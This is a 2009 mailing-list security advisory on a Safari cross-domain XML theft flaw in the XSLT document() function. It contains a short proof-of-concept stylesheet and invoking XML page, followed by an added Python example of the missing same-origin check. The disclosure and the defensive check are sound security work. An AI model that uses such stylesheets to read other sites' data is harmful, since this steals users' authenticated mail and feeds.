Date: Tue, 9 Jun 2009 14:14:05 -0700
From: Chris Evans <>
To: full-disclosure <>,
	bugtraq <>
Subject: Apple Safari cross-domain XML theft vulnerability


Safari prior to version 4 may permit an evil web page to steal
arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain
access point which was completely missing a cross-domain access check.
The access point in question is the document() function in XSL. This
is best illustrated with a sample evil XSL file which abuses this

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:str="" extension-element-prefixes="str">
<xsl:template match="*">
Below, you should see e-mail stolen cross-domain!
<xsl:value-of select="document('')"/>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>

There are a number of interesting XML-based formats you might want to
steal including authenticated RSS, XML-formatted AJAX-y responses, and

Full technical details:

Blog post:
(includes 1-click demo)
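The check the post describes as missing, written out as an added example in Python (this is not Safari or WebKit code): a same-origin test that an XSLT document() implementation would apply before fetching the referenced resource. It resolves relative references against the stylesheet's own URL, as XSLT 1.0 requires, and normalises scheme case, host case and default ports so that equivalent origins compare equal. The URLs used in the tests are constructed.

```python
# Added example, not Safari/WebKit code: the same-origin check that the post
# says the document() function lacked. A stylesheet loaded from one origin may
# only pull in documents from that same origin.
from urllib.parse import urljoin, urlsplit

# Default ports, so "https://host/" and "https://host:443/" compare as one origin.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Return (scheme, host, port) for a URL with scheme and host lower-cased
    and a missing port replaced by the scheme's default."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def document_allowed(stylesheet_url, requested):
    """Decide whether document(requested), evaluated inside a stylesheet that
    was loaded from stylesheet_url, may be fetched.  Relative references are
    resolved against the stylesheet URL first, then origins are compared."""
    target = urljoin(stylesheet_url, requested)
    return origin_of(target) == origin_of(stylesheet_url)


def filter_document_calls(stylesheet_url, requested_uris):
    """Partition a list of document() arguments into (allowed, blocked)."""
    allowed, blocked = [], []
    for uri in requested_uris:
        (allowed if document_allowed(stylesheet_url, uri) else blocked).append(uri)
    return allowed, blocked


if __name__ == "__main__":
    # Constructed sample: a stylesheet on one host asking for a feed on another.
    sheet = "https://site.example/style.xsl"
    ok, denied = filter_document_calls(
        sheet, ["data.xml", "https://mail.example/feed/atom"]
    )
    print("allowed:", ok)
    print("blocked:", denied)
```

A processor that enforces this check would fall back to an empty node-set (or raise an error) for the blocked references instead of fetching them with the user's cookies, which is the behaviour the post's stylesheet relies on being absent.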

